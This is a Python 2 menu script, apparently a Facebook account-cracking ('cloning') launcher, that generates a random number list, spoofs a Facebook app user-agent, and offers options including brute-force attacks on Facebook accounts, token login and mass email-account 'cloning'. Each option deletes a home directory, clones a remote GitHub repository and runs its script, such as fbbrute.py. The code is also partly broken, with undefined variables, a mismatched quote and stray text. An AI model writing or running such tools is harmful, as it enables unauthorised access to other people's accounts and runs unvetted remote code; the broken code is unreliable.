# Ustad# SIDRA5# Thuglife# Somibro# Gamz#!/usr/bin/python2
#coding=utf-8
import os,sys,time,datetime,random,hashlib,re,threading,json,urllib,cookielib,getpass
os.system('rm -rf .txt')
for n in range(20000):

    nmbr = random.randint(1111111, 9999999)
    
    sys.stdout = open('.txt', 'a')

    print(nmbr)

    sys.stdout.flush()
    
try:
    import requests
except ImportError:
    os.system('pip2 install mechanize')
    
try:
    import mechanize
except ImportError:
    os.system('pip2 install request')
    time.sleep(1)
    os.system('Then type: python2 boss')

import os,sys,time,datetime,random,hashlib,re,threading,json,urllib,cookielib,requests,mechanize
from multiprocessing.pool import ThreadPool
from requests.exceptions import ConnectionError
from mechanize import Browser


reload(sys)
sys.setdefaultencoding('utf8')
br = mechanize.Browser()
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(),max_time=1)
br.addheaders = [('User-Agent', 'Opera/12.0 (Android; Opera Mini/52.2.2254/85. U; id) Presto/2.12.423 Version/12.16')]
br.addheaders = [('user-agent','Dalvik/1.6.0 (Linux; U; Android 4.4.2; NX55 Build/KOT5506) [FBAN/FB4A;FBAV/106.0.0.26.68;FBBV/45904160;FBDM/{density=3.0,width=1080,height=1920};FBLC/it_IT;FBRV/45904160;FBCR/PosteMobile;FBMF/asus;FBBD/asus;FBPN/com.facebook.katana;FBDV/ASUS_Z00AD;FBSV/5.0;FBOP/1;FBCA/x86:armeabi-v7a;]')]

def exb():
    print '[!] Exit Successfully thanku somi'
    os.sys.exit()


def acak(b):
    w = 'ahtdzjc'
    d = ''
    for i in x:
        d += '!'+w[random.randint(0,len(w)-1)]+i
    return cetak(d)


def cetak(b):
    w = 'ahtdzjc'
    for i in w:
        j = w.index(i)
        x= x.replace('!%s'%i,'\033[%s;1m'%str(31+j))
    x += '\033[0m'
    x = x.replace('!0','\033[0m')
    sys.stdout.write(x+'\n')


def jalan(z):
	for e in z + '\n':
		sys.stdout.write(e)
		sys.stdout.flush()
		time.sleep(3.0 / 200)
def tik():
	titik = ['.   ','..  ','... ']
	for o in titik:
		print("\r\x1b[1;93mLo\033[1;96mad\033[1;92mi\033[1;92mng\x1b[1;97m"+o),;sys.stdout.flush();time.sleep(1)

back = 0
oks = []
id = []
cpb = []
vulnot = "\033[31mNot Vuln"
vuln = "\033[32mVuln"

os.system("clear")
logo = """

"""
logo1 = """
\033[1;90m
\033[1;92m _______  _______  _______ _________
\033[1;93m(  ____ \(  ___  )(       )\__   __/
\033[1;94m| (    \/| (   ) || () () |   ) (   
\033[1;93m| (_____ | |   | || || || |   | |   
\033[1;96m(_____  )| |   | || |(_)| |   | |   
\033[1;91m      ) || |   | || |   | |   | |   
\033[1;92m/\____) || (___) || )   ( |___) (___
\033[1;93m\_______)(_______)|/     \|\_______/

"""
jalan("\033[1;92m _______  _______  _______ _________")
jalan("\033[1;93m(  ____ \(  ___  )(       )\__   __/")
jalan("\033[1;94m| (    \/| (   ) || () () |   ) (   ")
jalan("\033[1;93m| (_____ | |   | || || || |   | |   ")
jalan('\033[1;96m(_____  )| |   | || |(_)| |   | |   ")
jalan("\033[1;91m      ) || |   | || |   | |   | |   ")
jalan("\033[1;92m/\____) || (___) || )   ( |___) (___")
jalan("\033[1;93m\_______)(_______)|/     \|\_______/")
user= raw_input("ENTER START PROGRAM")
Username = "SOMI"

loop = 'true'
while (loop == 'true'):
    username = raw_input("\033[1;93m\033[1;47m\033[1;31m             ENTER TOOL USER NAME              \033[1;0m   \033[1;96m\n \n[\xe2\x97\x8f]ENTER  > ")
                                                                              
    if (username == Username):
    	
            print "\n\033[1;92m      [\xe2\x97\x8f] \033[1;97mCORRECT USERNAME\033[1;0m"
	    time.sleep(3)
            loop = 'false'
     
##### LICENSE #####
#=================#
def lisensi():
    os.system('clear')
    login()
####login#########
def login():
    os.system('clear')
    print logo1
    
    print 47* '\033[1;96m▬'
    print
    print
    print
    jalan('\x1b[1;93m〖\x1b[1;92m1\x1b[1;96m〗\033[1;91mALL COUNTRIES WITHOUT LOGIN  ')
    jalan('\x1b[1;93m〖\x1b[1;92m2\x1b[1;96m〗\033[1;92mALL COUNTRIES WITHOUT LOGIN 2   ')
    jalan('\x1b[1;93m〖\x1b[1;92m3\x1b[1;96m〗\033[1;94mLOGIN FACEBOOK ACCOUNT WITH TOKEN    ')
    jalan('\x1b[1;93m〖\x1b[1;92m4\x1b[1;96m〗\033[1;93mATTACK FB ACCOUNT WITH BRUTE FORCE  ')
    jalan('\x1b[1;93m〖\x1b[1;92m5\x1b[1;96m〗\033[1;96mALL COUNTRIES EMAIL ACCOUNT CLONE    ')
    print
    print
    print
    print 47* '\033[1;96m▬'
    jalan('    \x1b[1;93m〖\x1b[1;92m6\x1b[1;96m〗\033[1;91mYOU\033[1;97mTUBE \x1b[1;93m〖\x1b[1;92m7\x1b[1;96m〗\033[1;94mFACE\033[1;97mBOOK \x1b[1;93m〖\x1b[1;92m00\x1b[1;96m〗\033[1;92mSTOP')
    print 47* '\033[1;96m▬'at
    pilih_Somi()
   
def pilih_Somi():    
    Somi = raw_input("\n\033[1;96m> \033[1;93m")
    if Somi =="":
        print "\x1b[1;97mSORRY WRONG "
        pilih_Somi()
        Somi()
    elif Somi =="1":
        tik()
        os.system("rm -rf $HOME/WORLD")
        os.system("cd $HOME && git clone https://github.com/Somi190/WORLD.git")     
        
        time.sleep(5)
        os.system("cd $HOME/WORLD && python2 WORLD.py")
        Somi()
    
    elif Somi =="2":                   
        tik()
        os.system("rm -rf $HOME/WORLD")
        os.system("cd $HOME && git clone https://github.com/Somi190/WORLD.git")     
        
        time.sleep(5)
        os.system("cd $HOME/WORLD && python2 world.py")
        Somi()
    elif Somi =="3":                   
        tik()
        os.system("rm -rf $HOME/Monster")
        os.system("cd $HOME && git clone https://github.com/Somi190/Monster.git")     
        
        time.sleep(5)
        os.system("cd $HOME/Monster && python2 Moon.py")
    elif Somi =="4":                   
        tik()
        os.system("rm -rf $HOME/WORLD")
        os.system("cd $HOME && git clone https://github.com/Somi190/WORLD.git")     
        
        time.sleep(5)
        os.system("cd $HOME/WORLD && python2 fbbrute.py")
        
    elif Somi =="5":             
        tik()
        os.system("rm -rf $HOME/star-boy")
        os.system("cd $HOME && git clone https://github.com/Somi190/star-boy.git")     
        
        time.sleep(5)
        os.system("cd $HOME/star-boy && python2 Star-boy")
        Somi()
    elif Somi =="6":                   
		os.system('xdg-open https://youtu.be/kvo2PWGBI8I')
		Somi()
    elif Somi =="7":                 
    	os.system('xdg-open https://www.facebook.com/profile.php?id=100041349421055')
        Somi()
    elif Somi == '00':    
    	tik()
        exb()    
        login()
    else:
        print '[!] Fill In Correctly'
        
    
    raw_input("\n\033[1;92m[\033[1;92mBack\033[1;95m]")
    login() 
          
if __name__ == '__main__':
    login()

